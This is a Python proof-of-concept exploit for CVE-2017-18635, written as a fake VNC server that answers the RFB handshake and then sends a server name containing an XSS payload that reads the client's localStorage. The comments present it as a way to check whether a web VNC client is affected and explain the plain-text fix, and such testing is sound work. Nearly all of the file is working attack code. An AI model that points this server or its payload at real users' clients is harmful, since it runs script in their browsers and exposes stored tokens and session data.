cve-2017-18635.py
import socket
import sys
from binascii import unhexlify as unhex, hexlify as hex
from time import sleep
def comunicate(conn, payload):
    """Send one hex-encoded message on *conn* and wait for the peer's reply.

    Args:
        conn: Connected socket to the client under test.
        payload: Message bytes written as a hex string (decoded with
            ``unhexlify`` before sending).

    Returns:
        None. Up to 1024 bytes of reply are read and then discarded.
    """
    raw = unhex(payload)
    conn.send(raw)
    # The reply is read only to keep the exchange in lockstep with the
    # client; its content is never inspected.
    conn.recv(1024)
# Minimal stand-in for a VNC (RFB) server, used to check whether a VNC client
# is affected by CVE-2017-18635. It answers the opening handshake and then
# reports a server name that contains HTML markup.
#
# Defender's view: the server name is data supplied by the remote end and must
# be treated as untrusted text. A client that writes it into the page as HTML
# will execute the markup; a client that inserts it as plain text (for example
# via textContent) and runs a release containing the fix for this CVE will
# display it harmlessly.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bound to loopback only, so the test server is reachable from this host alone.
try:
    s.bind(('127.0.0.1', 5902))
except socket.error as bind_err:
    print('Bind failed. Error Code : {}. Message: {}'.format(bind_err.errno, bind_err.strerror))
    sys.exit()

s.listen(10)
print('Server started')

while True:
    conn, addr = s.accept()
    peer_host, peer_port = addr[0], addr[1]
    print('Connected with ' + peer_host + ':' + str(peer_port))

    print('Sending version info')
    comunicate(conn, '524642203030332e3030380a')  # ASCII "RFB 003.008\n"

    print('Handshake')
    comunicate(conn, '0101')  # no password

    print('Starting the vnc dance')
    comunicate(conn, '00000000')

    print('Sending server-name with XSS injection')
    xss = b'<img onerror=alert(JSON.stringify(localStorage)) src=# />'
    # The fixed hex prefix is followed by the name length (one hex byte)
    # and then the name itself, hex-encoded.
    name_len = len(xss)
    name_hex = hex(xss).decode()
    comunicate(conn, '040003002018000100ff00ff00ff100800000000000000{:02x}{}'.format(name_len, name_hex))

    # Keep the connection open long enough for the client to render the name.
    sleep(30)
    print('Quitting')
    conn.close()

# NOTE(review): the listing lost its indentation; this call is placed after the
# loop, where it is never reached because the loop has no exit.
s.close()